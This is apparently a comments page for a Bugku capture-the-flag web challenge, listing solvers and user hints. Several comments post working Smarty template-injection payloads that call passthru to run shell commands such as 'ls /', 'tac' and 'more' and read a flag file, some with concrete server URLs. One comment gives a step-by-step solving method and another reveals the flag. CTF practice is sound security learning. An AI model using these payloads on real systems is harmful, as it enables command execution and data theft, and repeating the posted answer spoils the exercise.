评分(13)
解题动态
bugku0521 攻破了该题 1天前
vannnn30 攻破了该题 1天前
观风 攻破了该题 2天前
kramin 攻破了该题 3天前
bug1000 攻破了该题 3天前
Aptlion 攻破了该题 6天前
妈!有人打我 攻破了该题 6天前
1781****263 攻破了该题 6天前
shylock 攻破了该题 7天前
570570 攻破了该题 7天前
sxyscm 攻破了该题 8天前
mlins 攻破了该题 8天前
gongyizhen 攻破了该题 9天前
hell0-hnc 攻破了该题 9天前
浪不渝 攻破了该题 9天前
fade 攻破了该题 11天前
siyee 攻破了该题 11天前
caomao 攻破了该题 12天前
hanhan12138 攻破了该题 13天前
评论
icyskin 16天前
举报
http://160.202.254.160:17350/?key={{passthru(%27tail%20-100%20/_14781%27)}}
fuhaiyan 6月前
举报
?a={{passthru('more ../../../*|grep fla')}}
对对对对对对对对 8月前
举报
?key={{passthru(%27tac%20/_4427%27)}}
anony 1年前
举报
flag{********}
人闲桂花落 1年前
举报
tac命令读取也可
docker0w 1年前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 2年前
举报
?key={passthru("tac%20/_28710")}
yun20231227 2年前
举报
?key={{passthru('ls /')}}
xinkuang 2年前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
Daniel2023 2年前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}